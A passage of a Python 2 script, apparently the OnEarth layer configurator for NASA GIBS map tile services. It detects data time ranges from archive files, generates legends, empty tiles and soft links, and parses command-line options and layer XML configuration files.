next_day = d + timedelta(weeks=period_value)
elif period[-1] == "M" and subdaily == False:
next_day = d + relativedelta(months=period_value)
elif period[-1] == "Y":
next_day = d + relativedelta(years=period_value)
elif period[-1] == "H":
next_day = d + relativedelta(hours=period_value)
elif period[-1] == "M" and subdaily == True:
next_day = d + relativedelta(minutes=period_value)
elif period[-1] == "S":
next_day = d + relativedelta(seconds=period_value)
else:
next_day = d + timedelta(days=period_value)
try:
if dates[i + 1] == next_day:
enddate = next_day # set end date to next existing day
else: # end of range
if subdaily == False:
print "Break in data beginning on " + datetime.strftime(
next_day, "%Y-%m-%d")
start = datetime.strftime(startdate, "%Y-%m-%d")
end = datetime.strftime(enddate, "%Y-%m-%d")
else:
print "Break in data beginning on " + datetime.strftime(
next_day, "%Y-%m-%dT%H:%M:%SZ")
start = datetime.strftime(startdate,
"%Y-%m-%dT%H:%M:%SZ")
end = datetime.strftime(enddate, "%Y-%m-%dT%H:%M:%SZ")
times.append(start + '/' + end + '/' + period)
startdate = dates[i + 1] # start new range loop
enddate = startdate
except IndexError:
# breaks when loop completes
if subdaily == False:
start = datetime.strftime(startdate, "%Y-%m-%d")
end = datetime.strftime(enddate, "%Y-%m-%d")
else:
start = datetime.strftime(startdate, "%Y-%m-%dT%H:%M:%SZ")
end = datetime.strftime(enddate, "%Y-%m-%dT%H:%M:%SZ")
times.append(start + '/' + end + '/' + period)
print "End of data " + end
print "Time ranges: " + ", ".join(times)
return times
else:
intervals = time.split('/')
if intervals[0][0] == 'P': #starts with period, so no start date
start = detect
else:
start = ''
has_period = False
for interval in list(intervals):
if len(interval) > 0:
if interval[0] == 'P':
has_period = True
period = interval
intervals.remove(interval)
else:
intervals.remove(interval)
if has_period == False:
message = "No period in time configuration for " + fileNamePrefix
if has_zdb == False:
message = message + " - using P1D"
log_sig_warn(message, sigevent_url)
print "Using period " + period
if len(intervals) == 2:
start = intervals[0]
end = intervals[1]
else:
if start == detect:
end = intervals[0]
else:
start = intervals[0]
end = detect
if start == detect or end == detect:
newest_year = ''
oldest_year = ''
if year == True: # get newest and oldest years
years = []
for yearDirPath in glob.glob(archiveLocation + '/[0-9]*'):
if os.listdir(yearDirPath
) != []: # check if directory is not empty
years.append(os.path.basename(yearDirPath))
else:
log_sig_warn(yearDirPath + " is empty", sigevent_url)
years.sort()
if len(years) > 0:
oldest_year = years[0]
newest_year = years[-1]
print "Year directories available: " + ",".join(years)
if (newest_year == '' or oldest_year == '') and year == True:
mssg = "No data files found in year directories in " + archiveLocation
log_sig_warn(mssg, sigevent_url)
return times
elif year == True:
print "Available range with data is %s to %s" % (oldest_year,
newest_year)
if start == detect:
dates = []
for f in glob.glob(archiveLocation + '/' + oldest_year +
'/*[idx,shp,json]'):
filename = os.path.basename(f)
if str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJ") + 5):
try:
filetime = filename[-12:-5]
filedate = datetime.strptime(filetime, "%Y%j")
dates.append(filedate)
except ValueError:
print "Skipping", filename
elif str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJHHMMSS") + 5):
try:
filetime = filename[-18:-5]
filedate = datetime.strptime(filetime, "%Y%j%H%M%S")
dates.append(filedate)
subdaily = True
except ValueError:
print "Skipping", filename
else:
print "Ignoring", filename
if len(dates) == 0:
message = "No valid files with dates found for '" + fileNamePrefix + "' in '" + archiveLocation + "/" + oldest_year + "' - please check if data exists."
log_sig_err(message, sigevent_url)
return times
startdate = min(dates)
if has_zdb == True:
try:
zdb = archiveLocation + '/' + oldest_year + '/' + fileNamePrefix + datetime.strftime(
startdate, "%Y%j") + '_.zdb'
zkey = read_zkey(zdb, 'ASC')
startdate = datetime.strptime(str(zkey), "%Y%m%d%H%M%S")
subdaily = True
except ValueError:
if zkey.lower() != "default":
log_sig_warn("No valid time found in " + zdb,
sigevent_url)
if subdaily == False:
start = datetime.strftime(startdate, "%Y-%m-%d")
else:
start = datetime.strftime(startdate, "%Y-%m-%dT%H:%M:%SZ")
if end == detect:
dates = []
for f in glob.glob(archiveLocation + '/' + newest_year +
'/*[idx,shp,json]'):
filename = os.path.basename(f)
if str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJ") + 5):
try:
filetime = filename[-12:-5]
filedate = datetime.strptime(filetime, "%Y%j")
dates.append(filedate)
except ValueError:
print "Skipping", filename
elif str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJHHMMSS") + 5):
try:
filetime = filename[-18:-5]
filedate = datetime.strptime(filetime, "%Y%j%H%M%S")
dates.append(filedate)
subdaily = True
except ValueError:
print "Skipping", filename
else:
print "Ignoring", filename
enddate = max(dates)
if has_zdb == True:
try:
zdb = archiveLocation + '/' + newest_year + '/' + fileNamePrefix + datetime.strftime(
enddate, "%Y%j") + '_.zdb'
zkey = read_zkey(zdb, 'DESC')
enddate = datetime.strptime(str(zkey), "%Y%m%d%H%M%S")
subdaily = True
except ValueError:
if zkey.lower() != "encoded":
log_sig_warn("No valid time found in " + zdb,
sigevent_url)
if subdaily == False:
end = datetime.strftime(enddate, "%Y-%m-%d")
else:
end = datetime.strftime(enddate, "%Y-%m-%dT%H:%M:%SZ")
if has_zdb == True and has_period == False:
time = start + '/' + end
else:
time = start + '/' + end + '/' + period
print str(time)
times.append(time)
return times
def read_zkey(zdb, sort):
"""
Reads z-index database file and returns the first or last key depending on sort order
Arguments:
zdb -- the z-index database file name
sort -- the sort order
"""
try:
log_info_mssg("Connecting to " + zdb)
db_exists = os.path.isfile(zdb)
if db_exists == False:
log_sig_err(zdb + " does not exist", sigevent_url)
return "Error"
else:
con = sqlite3.connect(zdb, timeout=60) # 1 minute timeout
cur = con.cursor()
# Check for existing key
cur.execute("SELECT key_str FROM ZINDEX ORDER BY key_str " + sort +
" LIMIT 1;")
try:
key = cur.fetchone()[0].split("|")[0]
log_info_mssg("Retrieved key " + key)
except:
return "Error"
if con:
con.close()
return key
except sqlite3.Error, e:
if con:
con.rollback()
mssg = "%s:" % e.args[0]
log_sig_err(mssg, sigevent_url)
def get_file_from_time(timestr, fileNamePrefix, include_year_dir, has_zdb):
"""
Retrieves the filename (without extension) of a file based on a time string and file name prefix
Arguments:
timestr -- time string (%Y-%m-%d or %Y-%m-%dT%H:%M:%SZ)
fileNamePrefix -- the prefix of the MRF files
include_year_dir -- whether or not to include the parent year directory
has_zdb -- whether or not the layer contains a zdb file
"""
if 'T' in timestr: # sub-daily files
t = datetime.strptime(timestr, "%Y-%m-%dT%H:%M:%SZ")
if has_zdb:
filename = fileNamePrefix + datetime.strftime(t, "%Y%j") + "_"
else:
filename = fileNamePrefix + datetime.strftime(t,
"%Y%j%H%M%S") + "_"
last_year = datetime.strftime(t, "%Y")
else:
t = datetime.strptime(timestr, "%Y-%m-%d")
filename = fileNamePrefix + datetime.strftime(t, "%Y%j") + "_"
last_year = datetime.strftime(t, "%Y")
if include_year_dir:
return str(last_year) + "/" + filename
else:
return filename
def generate_legend(colormap, output, legend_url, format, orientation):
"""
Generate a legend graphic from GIBS color map.
Returns: WMTS <LegendURL> metadata tag, legend width, legend height.
Arguments:
colormap -- the color map file name
output -- the output file name
legend_url -- URL to access legend from GetCapabilities
format -- the format of the legend ('png' or 'svg')
orientation -- the orientation of the legend
"""
print "\nLegend location: " + output
print "Legend URL: " + legend_url
print "Color Map: " + colormap
print "Format: " + format
print "Orientation: " + orientation
pt = 1.25 #pixels in point
legend_url_metadata = ''
width = ''
height = ''
if format not in ["svg","png"]:
log_sig_err("Error generating legend; Invalid format: " + format, sigevent_url)
return
elif orientation not in ["horizontal","vertical"]:
log_sig_err("Error generating legend; Invalid orientation: " + orientation, sigevent_url)
return
cmd = 'oe_generate_legend.py -c ' + colormap + ' -o ' + output + ' -r ' + orientation + ' -f ' + format
if os.path.isfile(output) == False:
print "Generating new legend"
try:
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err("Error generating legend: " + str(e), sigevent_url)
else:
print "Legend already exists"
try:
colormap_file = urllib.urlopen(colormap)
last_modified = colormap_file.info().getheader("Last-Modified")
colormap_file.close()
colormap_time = datetime.strptime(last_modified,
"%a, %d %b %Y %H:%M:%S GMT")
legend_time = datetime.fromtimestamp(os.path.getmtime(output))
print "Color map last modified on: " + str(colormap_time)
print "Legend last modified on: " + str(legend_time)
if colormap_time > legend_time:
print "Updated color map found, generating new legend"
run_command(cmd, sigevent_url)
else:
print "Updated color map not found, skipping legend generation"
except Exception, e:
log_sig_err("Error generating legend: " + str(e), sigevent_url)
# check file
try:
if format == "svg":
# Open file.
svg = open(output, 'r')
# get width and height
dom = xml.dom.minidom.parse(svg)
svgElement = dom.getElementsByTagName('svg')[0]
height = float(svgElement.attributes['height'].value.replace('pt',
'')) * pt
width = float(svgElement.attributes['width'].value.replace('pt', '')) * pt
svg.close()
if orientation == 'horizontal':
legend_url_metadata = '<LegendURL format="image/svg+xml" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/horizontal" xlink:href="%s" xlink:title="GIBS Color Map Legend: Horizontal" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
else:
legend_url_metadata = '<LegendURL format="image/svg+xml" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/vertical" xlink:href="%s" xlink:title="GIBS Color Map Legend: Vertical" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
# png
else:
# get width and height
gdalinfo_command_list = ['gdalinfo', '-json', output]
gdalinfo = subprocess.Popen(gdalinfo_command_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outputInfo = json.loads(gdalinfo.stdout.read())
width = outputInfo["size"][0]
height = outputInfo["size"][1]
if orientation == 'horizontal':
legend_url_metadata = '<LegendURL format="image/png" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/horizontal" xlink:href="%s" xlink:title="GIBS Color Map Legend: Horizontal" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
else:
legend_url_metadata = '<LegendURL format="image/png" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/vertical" xlink:href="%s" xlink:title="GIBS Color Map Legend: Vertical" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
except IOError:
mssg = str().join(['Cannot read legend file: ', output])
log_sig_err(mssg, sigevent_url)
return legend_url_metadata, width, height
def generate_empty_tile(colormap, output, width, height):
"""
Generate an empty tile from nodata value in GIBS color map.
Arguments:
colormap -- the color map file name
output -- the output file name
width -- the width of the empty tile
height -- the height of the empty tile
"""
print "Generating empty tile"
print "Empty Tile Location: " + output
print "Color Map: " + colormap
print "Width: " + str(width)
print "Height: " + str(height)
empty_size = 0
try:
cmd = 'oe_generate_empty_tile.py -c ' + colormap + ' -o ' + output + ' -x ' + str(
width) + ' -y ' + str(height)
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err("Error generating empty tile: " + str(e), sigevent_url)
# check file
try:
# Get file size
empty_size = os.path.getsize(output)
print "Empty tile size: " + str(empty_size)
except:
mssg = str().join(['Cannot read generated empty tile: ', output])
log_sig_err(mssg, sigevent_url)
return empty_size
def generate_links(detected_times, archiveLocation, fileNamePrefix, year,
dataFileLocation, has_zdb):
"""
Generate a archive links for a layer based on the last provided time period
Arguments:
detected_times -- the list of available time periods
archiveLocation -- the location of the archive data
fileNamePrefix -- the prefix of the MRF files
year -- whether or not the layer uses a year-based directory structure
dataFileLocation -- file location for the default data file
has_zdb -- whether or not the layer contains a zdb file
"""
last_time = detected_times[-1].split("/")[1]
if os.path.isfile(
archiveLocation +
get_file_from_time(last_time, fileNamePrefix, year, has_zdb) +
".idx"
) == False: # Detect the last time if file for specified time cannot be found
log_sig_warn(
"Files for specified last time of " + last_time +
" cannot be found for " + fileNamePrefix +
", attempting to detect instead", sigevent_url)
if len(detected_times[-1].split("/")) == 3:
period = "/" + detected_times[-1].split("/")[2]
else:
period = ""
try:
last_time = detect_time(
detected_times[-1].split("/")[0] + "/DETECT" + period,
archiveLocation, fileNamePrefix, year,
has_zdb)[-1].split("/")[1]
except IndexError:
log_sig_err(
"Unable to generate links due to no data files found for " +
fileNamePrefix, sigevent_url)
return ""
print "Current layer time for soft links: " + last_time
link_pre, data_ext = os.path.splitext(dataFileLocation)
link_dir = os.path.dirname(link_pre)
filename = get_file_from_time(last_time, fileNamePrefix, year, has_zdb)
mrf = archiveLocation + filename + ".mrf"
idx = archiveLocation + filename + ".idx"
data = archiveLocation + filename + data_ext
zdb = archiveLocation + filename + ".zdb"
mrf_link = link_pre + ".mrf"
idx_link = link_pre + ".idx"
data_link = link_pre + data_ext
zdb_link = link_pre + ".zdb"
# make sure link directory exists
if not os.path.exists(link_dir):
os.makedirs(link_dir)
print "Created directory " + link_dir
if os.path.isfile(mrf):
if os.path.lexists(mrf_link):
os.remove(mrf_link)
print "Removed existing file " + mrf_link
os.symlink(mrf, mrf_link)
print "Created soft link " + mrf_link + " -> " + mrf
if os.path.isfile(idx):
if os.path.lexists(idx_link):
os.remove(idx_link)
print "Removed existing file " + idx_link
os.symlink(idx, idx_link)
print "Created soft link " + idx_link + " -> " + idx
else:
if data_ext != ".shp" or data_ext != ".json":
log_sig_warn("Default MRF index file " + idx + " does not exist",
sigevent_url)
if os.path.isfile(data):
if os.path.lexists(data_link):
os.remove(data_link)
print "Removed existing file " + data_link
os.symlink(data, data_link)
print "Created soft link " + data_link + " -> " + data
else:
log_sig_warn("Default MRF data file " + data + " does not exist",
sigevent_url)
if os.path.isfile(zdb):
if os.path.lexists(zdb_link):
os.remove(zdb_link)
print "Removed existing file " + zdb_link
os.symlink(zdb, zdb_link)
print "Created soft link " + zdb_link + " -> " + zdb
# special handling for shapefiles
if data_ext == ".shp":
files = glob.glob(archiveLocation + filename + "*")
for sfile in files:
ext = os.path.splitext(os.path.basename(sfile))[1]
if os.path.lexists(link_pre + ext):
os.remove(link_pre + ext)
print "Removed existing file " + link_pre + ext
os.symlink(sfile, link_pre + ext)
print "Created soft link " + link_pre + ext + " -> " + sfile
return mrf_link, idx_link, data_link, zdb_link
#-------------------------------------------------------------------------------
print 'OnEarth Layer Configurator v' + versionNumber
if os.environ.has_key('LCDIR') == False:
print 'LCDIR environment variable not set.\nLCDIR should point to your OnEarth layer_config directory.\n'
lcdir = os.path.abspath(os.path.dirname(__file__) + '/..')
else:
lcdir = os.environ['LCDIR']
usageText = 'oe_configure_layer.py --conf_file [layer_configuration_file.xml] --layer_dir [$LCDIR/layers/] --lcdir [$LCDIR] --projection_config [projection.xml] --time [ISO 8601] --restart_apache --no_xml --no_cache --no_twms --no_wmts --generate_legend --generate_links --skip_empty_tiles --create_mapfile'
# Define command line options and args.
parser = OptionParser(usage=usageText, version=versionNumber)
parser.add_option(
'-a',
'--archive_config',
action='store',
type='string',
dest='archive_configuration',
help=
'Full path of archive configuration file. Default: $LCDIR/conf/archive.xml'
)
parser.add_option(
'-c',
'--conf_file',
action='store',
type='string',
dest='layer_config_filename',
help='Full path of layer configuration filename.')
parser.add_option(
'-d',
'--layer_dir',
action='store',
type='string',
dest='layer_directory',
help=
'Full path of directory containing configuration files for layers. Default: $LCDIR/layers/'
)
parser.add_option(
"-e",
"--skip_empty_tiles",
action="store_true",
dest="skip_empty_tiles",
default=False,
help=
"Do not generate empty tiles for layers using color maps in configuration."
)
parser.add_option(
"-g",
"--generate_legend",
action="store_true",
dest="generate_legend",
default=False,
help="Generate legends for layers using color maps in configuration.")
parser.add_option(
'-l',
'--lcdir',
action='store',
type='string',
dest='lcdir',
default=lcdir,
help=
'Full path of the OnEarth Layer Configurator (layer_config) directory. Default: $LCDIR'
)
parser.add_option(
'-m',
'--tilematrixset_config',
action='store',
type='string',
dest='tilematrixset_configuration',
help=
'Full path of TileMatrixSet configuration file. Default: $LCDIR/conf/tilematrixsets.xml'
)
parser.add_option(
"-n",
"--no_twms",
action="store_true",
dest="no_twms",
default=False,
help="Do not use configurations for Tiled-WMS")
parser.add_option(
'-p',
'--projection_config',
action='store',
type='string',
dest='projection_configuration',
help=
'Full path of projection configuration file. Default: $LCDIR/conf/projection.xml'
)
parser.add_option(
"-r",
"--restart_apache",
action="store_true",
dest="restart",
default=False,
help="Restart the Apache server on completion (requires sudo).")
parser.add_option(
"-s",
"--send_email",
action="store_true",
dest="send_email",
default=False,
help="Send email notification for errors and warnings.")
parser.add_option(
'--email_server',
action='store',
type='string',
dest='email_server',
default='',
help=
'The server where email is sent from (overrides configuration file value)')
parser.add_option(
'--email_recipient',
action='store',
type='string',
dest='email_recipient',
default='',
help=
'The recipient address for email notifications (overrides configuration file value)'
)
parser.add_option(
'--email_sender',
action='store',
type='string',
dest='email_sender',
default='',
help=
'The sender for email notifications (overrides configuration file value)')
parser.add_option(
'--email_logging_level',
action='store',
type='string',
dest='email_logging_level',
default='ERROR',
help=
'Logging level for email notifications: ERROR, WARN, or INFO. Default: ERROR'
)
parser.add_option(
'-t',
'--time',
action='store',
type='string',
dest='time',
help=
'ISO 8601 time(s) for single configuration file (conf_file must be specified).'
)
parser.add_option(
"-w",
"--no_wmts",
action="store_true",
dest="no_wmts",
default=False,
help="Do not use configurations for WMTS.")
parser.add_option(
"-x",
"--no_xml",
action="store_true",
dest="no_xml",
default=False,
help="Do not generate getCapabilities and getTileService XML.")
parser.add_option(
"-y",
"--generate_links",
action="store_true",
dest="generate_links",
default=False,
help=
"Generate default/current day links in the archive for time varying layers."
)
parser.add_option(
"-z",
"--no_cache",
action="store_true",
dest="no_cache",
default=False,
help=
"Do not copy cache configuration files and Apache configs to final location."
)
parser.add_option(
'--tmslimits_config',
action='store',
type='string',
dest='tmslimits_configuration',
help=
'Full path of TileMatrixSet configuration file. Default: $LCDIR/conf/tilematrixsetlimits.xml'
)
parser.add_option(
"--create_mapfile",
action="store_true",
dest="create_mapfile",
default=False,
help="Create MapServer configuration.")
# Read command line args.
(options, args) = parser.parse_args()
# Configuration filename.
configuration_filename = options.layer_config_filename
# Command line set LCDIR.
lcdir = options.lcdir
# Configuration directory.
if options.layer_directory:
configuration_directory = options.layer_directory
else:
configuration_directory = lcdir + '/layers/'
# No XML configurations (getCapabilities, getTileService)
no_xml = options.no_xml
# No cache configuration.
no_cache = options.no_cache
# No Tiled-WMS configuration.
no_twms = options.no_twms
# No WMTS configuration.
no_wmts = options.no_wmts
# No MapServer configuration.
create_mapfile = options.create_mapfile
# Do restart Apache.
restart = options.restart
# Time for conf file.
configuration_time = options.time
# Generate Empty Tiles
skip_empty_tiles = options.skip_empty_tiles
# Generate legends
legend = options.generate_legend
# Generate links
links = options.generate_links
# Projection configuration
if options.projection_configuration:
projection_configuration = options.projection_configuration
else:
projection_configuration = lcdir + '/conf/projection.xml'
# TileMatrixSet configuration
if options.tilematrixset_configuration:
tilematrixset_configuration = options.tilematrixset_configuration
else:
tilematrixset_configuration = lcdir + '/conf/tilematrixsets.xml'
# Archive configuration
if options.archive_configuration:
archive_configuration = options.archive_configuration
else:
archive_configuration = lcdir + '/conf/archive.xml'
# TileMatrixSetLimits configuration
if options.tmslimits_configuration:
tmslimits_configuration = options.tmslimits_configuration
else:
tmslimits_configuration = lcdir + '/conf/tilematrixsetlimits.xml'
# Send email.
send_email = options.send_email
# Email server.
email_server = options.email_server
# Email recipient
email_recipient = options.email_recipient
# Email recipient
email_sender = options.email_sender
# Email logging level
logging_level = options.email_logging_level.upper()
# Email metadata replaces sigevent_url
if send_email:
sigevent_url = (email_server, email_recipient, email_sender, logging_level)
else:
sigevent_url = ''
print 'Using ' + lcdir + ' as $LCDIR.'
if no_xml:
log_info_mssg(
"no_xml specified, getCapabilities and getTileService files will be staged only"
)
if no_cache:
log_info_mssg(
"no_cache specified, cache configuration files will be staged only")
restart = False
if not create_mapfile:
log_info_mssg("create_mapfile not specified, no mapfiles will be created")
if no_twms and no_wmts and not create_mapfile:
log_info_mssg(
"no_twms and no_wmts and create_mapfile not specified, nothing to do...exiting"
)
exit()
if configuration_time:
if configuration_filename == None:
print "A configuration file must be specified with --time"
exit()
else:
print "Using time='" + configuration_time + "' for " + configuration_filename
# set location of tools
if os.path.isfile(os.path.abspath(lcdir) + '/bin/oe_create_cache_config'):
depth = os.path.abspath(lcdir) + '/bin'
elif distutils.spawn.find_executable('oe_create_cache_config') != None:
depth = distutils.spawn.find_executable('oe_create_cache_config').split(
'/oe_create_cache_config')[0]
else:
depth = '/usr/bin' # default
# Read XML configuration files.
conf_files = []
wmts_endpoints = {}
twms_endpoints = {}
wms_endpoints = {}
if not options.layer_config_filename:
conf = subprocess.Popen(
'ls ' + configuration_directory + '/*.xml',
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).stdout
for line in conf:
conf_files.append(line.strip())
else:
# use only the solo MRF when specified
conf_files.append(configuration_filename)
print 'Configuration file(s):'
print conf_files
if conf_files == []:
mssg = 'No configuration files found.'
log_sig_exit('ERROR', mssg, sigevent_url)
for conf in conf_files:
current_conf = conf
try:
# Open file.
config_file = open(conf, 'r')
print('\nUsing config: ' + conf)
except IOError:
log_sig_err(str().join(['Cannot read configuration file: ', conf]),
sigevent_url)
continue
else:
dom = xml.dom.minidom.parse(config_file)
# Get environment
try:
environmentConfig = get_dom_tag_value(dom, 'EnvironmentConfig')
try:
environment = get_environment(environmentConfig, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
continue
except IndexError:
log_sig_err(
'Required <EnvironmentConfig> element is missing in ' + conf,
sigevent_url)
continue
# Get default email server and recipient if not override
if options.email_server == '':
email_server = environment.emailServer
if options.email_recipient == '':
email_recipient = environment.emailRecipient
if options.email_sender == '':
email_sender = environment.emailSender
if send_email:
sigevent_url = (email_server, email_recipient, email_sender,
logging_level)
if email_recipient == '':
log_sig_err("No email recipient provided for notifications.",
sigevent_url)
wmts_getCapabilities = environment.getCapabilities_wmts
twms_getCapabilities = environment.getCapabilities_twms
getTileService = environment.getTileService
# Reprojected layers are handled by a separate script
if dom.getElementsByTagName('ReprojectLayerConfig'):
projection = get_projection('EPSG:3857', projection_configuration,
lcdir, tilematrixset_configuration)
print 'Configuring reprojection layers...'
base_twms_gc = lcdir + '/conf/getcapabilities_base_twms.xml'
base_twms_get_tile_service = lcdir + '/conf/gettileservice_base.xml'
base_wmts_gc = lcdir + '/conf/getcapabilities_base_wmts.xml'
reproject_warnings, reproject_errors = build_reproject_configs(
conf,
tilematrixset_configuration,
wmts=not no_wmts,
twms=not no_twms,
create_gc=not no_xml,
sigevent_url=sigevent_url,
stage_only=no_cache,
base_wmts_gc=base_wmts_gc,
base_twms_gc=base_twms_gc,
base_twms_get_tile_service=base_twms_get_tile_service,
create_mapfile=create_mapfile)
warnings += reproject_warnings
errors += reproject_errors
wmtsEndPoint = environment.wmts_dir
twmsEndPoint = environment.twms_dir
cacheLocation_wmts = environment.cacheLocation_wmts
cacheBasename_wmts = environment.cacheBasename_wmts
cacheLocation_twms = environment.cacheLocation_twms
cacheBasename_twms = environment.cacheBasename_twms
wmts_endpoints[wmtsEndPoint] = WMTSEndPoint(
wmtsEndPoint, cacheLocation_wmts, cacheBasename_wmts,
wmts_getCapabilities, projection)
twms_endpoints[twmsEndPoint] = TWMSEndPoint(
twmsEndPoint, cacheLocation_twms, cacheBasename_twms,
twms_getCapabilities, getTileService, projection)
wms_endpoints[environment.mapfileStagingLocation] = WMSEndPoint(
environment.mapfileStagingLocation,
environment.mapfileLocation,
environment.mapfileLocationBasename,
environment.mapfileConfigLocation,
environment.mapfileConfigBasename)
continue
# Stage layers XML from remote GetCapabilities if config found
if dom.getElementsByTagName('RemoteGetCapabilities'):
remote_warnings, remote_errors = get_remote_layers(conf,
wmts=not no_wmts,
twms=not no_twms,
sigevent_url=sigevent_url,
create_mapfile=create_mapfile)
warnings += remote_warnings
errors += remote_errors
continue
#Vector parameters
try:
vectorType = dom.getElementsByTagName('VectorType')[0].firstChild.nodeValue
try:
mapfileLayerContents = dom.getElementsByTagName(
'MapfileLayerContents')[0].firstChild.nodeValue
except IndexError:
mapfileLayerContents = None
except IndexError:
vectorType = None
mapfileLayerContents = None
#Required parameters
try:
identifier = get_dom_tag_value(dom, 'Identifier')
except IndexError:
log_sig_err('Required <Identifier> element is missing in ' + conf,
sigevent_url)
continue
try:
title = get_dom_tag_value(dom, 'Title')
except IndexError:
log_sig_err('Required <Title> element is missing in ' + conf,
sigevent_url)
continue
try:
is_encoded = False
compression = get_dom_tag_value(dom, 'Compression')
compression = compression.upper()
if compression == "JPG":
compression = "JPEG"
if compression == "PPNG":
compression = "PNG"
if compression == "TIFF":
compression = "TIF"
if compression == "EPNG":
compression = "PNG"
is_encoded = True
if compression not in [
"JPEG", "PNG", "EPNG", "TIF", "LERC", "MVT"
]:
log_sig_err(
'<Compression> must be either JPEG, PNG, TIF, LERC, or MVT in '
+ conf, sigevent_url)
continue
except IndexError:
if vectorType is None:
log_sig_err(
'Required <Compression> element is missing in ' + conf,
sigevent_url)
continue
else:
compression = "None"
try:
tilematrixset = get_dom_tag_value(dom, 'TileMatrixSet')
except:
if vectorType is None:
log_sig_err(
'Required <TileMatrixSet> element is missing in ' + conf,
sigevent_url)
continue
else:
tilematrixset = "None"
try:
emptyTileSize = int(get_dom_tag_value(dom, 'EmptyTileSize'))
except IndexError:
try:
emptyTileSize = ""
emptyTile = get_dom_tag_value(dom, 'EmptyTile')
except IndexError: # Required if EmptyTile is not specified
if vectorType is None:
log_sig_err(
'Required <EmptyTileSize> or <EmptyTile> element is missing in '
+ conf, sigevent_url)
continue
try:
fileNamePrefix = get_dom_tag_value(dom, 'FileNamePrefix')
except IndexError:
log_sig_err(
'Required <FileNamePrefix> element is missing in ' + conf,
sigevent_url)
continue
try:
environmentConfig = get_dom_tag_value(dom, 'EnvironmentConfig')
try:
environment = get_environment(environmentConfig, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
continue
except IndexError:
log_sig_err(
'Required <EnvironmentConfig> element is missing in ' + conf,
sigevent_url)
continue
cacheLocation_wmts = environment.cacheLocation_wmts
cacheBasename_wmts = environment.cacheBasename_wmts
cacheLocation_twms = environment.cacheLocation_twms
cacheBasename_twms = environment.cacheBasename_twms
cacheConfig = cacheLocation_wmts # default to WMTS cache location
wmtsServiceUrl = environment.wmtsServiceUrl
twmsServiceUrl = environment.twmsServiceUrl
# Optional parameters
try:
tiledGroupName = get_dom_tag_value(dom, 'TiledGroupName')
except:
tiledGroupName = identifier.replace("_", " ") + " tileset"
try:
wmsSourceLoc = get_dom_tag_value(dom, 'WMSSourceLoc')
except:
wmsSourceLoc = "Local"
try:
wmsGroupName = get_dom_tag_value(dom, 'WMSGroupName')
except:
wmsGroupName = None
try:
wmsLayerGroupName = get_dom_tag_value(dom, 'WMSLayerGroupName')
except:
wmsLayerGroupName = None
try:
abstract = get_dom_tag_value(dom, 'Abstract')
except:
abstract = identifier + " abstract"
try:
archiveLocation = get_dom_tag_value(dom, 'ArchiveLocation')
except:
archiveLocation = None
try:
static = dom.getElementsByTagName(
'ArchiveLocation')[0].attributes['static'].value.lower() in [
'true'
]
except:
static = True
try:
year = dom.getElementsByTagName(
'ArchiveLocation')[0].attributes['year'].value.lower() in [
'true'
]
except:
year = False
try:
subdaily = dom.getElementsByTagName(
'ArchiveLocation')[0].attributes['subdaily'].value.lower() in [
'true'
]
except:
subdaily = False
try:
archive_root = get_archive(
dom.getElementsByTagName('ArchiveLocation')[0].
attributes['root'].value, archive_configuration)
except:
archive_root = ""
archiveLocation = archive_root + archiveLocation
tmsLimits = None
try:
tmsLimitId = get_dom_tag_value(dom, 'TileMatrixSetLimitsId')
tmsLimits = get_tmslimits(tmsLimitId, tmslimits_configuration)
except IndexError:
pass
except ValueError as e:
errors.append(e)
try:
headerFileName = get_dom_tag_value(dom, 'HeaderFileName')
except:
headerFileName = None
try:
dataFileLocation = get_dom_tag_value(dom, 'DataFileLocation')
except:
dataFileLocation = None
try:
indexFileLocation = get_dom_tag_value(dom, 'IndexFileLocation')
except:
indexFileLocation = None
try:
zIndexFileLocation = get_dom_tag_value(dom, 'ZIndexFileLocation')
except:
zIndexFileLocation = None
try:
projection = get_projection(
get_dom_tag_value(dom, 'Projection'), projection_configuration,
lcdir, tilematrixset_configuration)
except IndexError:
log_sig_err('Required <Projection> element is missing in ' + conf,
sigevent_url)
continue
except Exception, e:
log_sig_err(str(e), sigevent_url)
continue
# Modified in 0.9 to allow for multiple versioned colormaps
# Sort out any empty ColorMap tags
colormaps = []
for colormap in dom.getElementsByTagName('ColorMap'):
if colormap.firstChild:
colormaps.append(colormap)
# Set default colormap (if none indicated, picks the last colormap found)
default_colormap = None
if colormaps:
if len(colormaps) == 1:
default_colormap = colormaps[0]
else:
for colormap in colormaps:
if 'default' in colormap.attributes.keys(
) and colormap.attributes['default'].value == 'true':
if default_colormap is not None:
err_msg = 'Multiple <ColorMap> elements have "default=true" attribute but only one is allowed, using ' + colormap.toxml(
)
log_sig_err(err_msg, sigevent_url)
default_colormap = colormap
if len(colormaps) > 1 and default_colormap is None:
default_colormap = colormaps[-1]
err_msg = 'Multiple <ColorMap> elements but none have "default=true" attribute, using ' + default_colormap.toxml(
)
log_sig_err(err_msg, sigevent_url)
# Match <ColorMapLocation> and <ColorMapURL> to colormaps with the same version and set them as attributes of the <ColorMap>
if colormaps:
for colormap in colormaps:
if 'version' not in colormap.attributes.keys():
colormap.attributes['version'] = ''
colormap_value = colormap.firstChild.nodeValue
version = colormap.attributes['version'].value
location = next(
(location.firstChild.nodeValue
for location in environment.colormap_dirs
if location.attributes['version'].value == version), None)
url = next((url.firstChild.nodeValue
for url in environment.colormapUrls
if url.attributes['version'].value == version),
None)
if not location:
location = ''
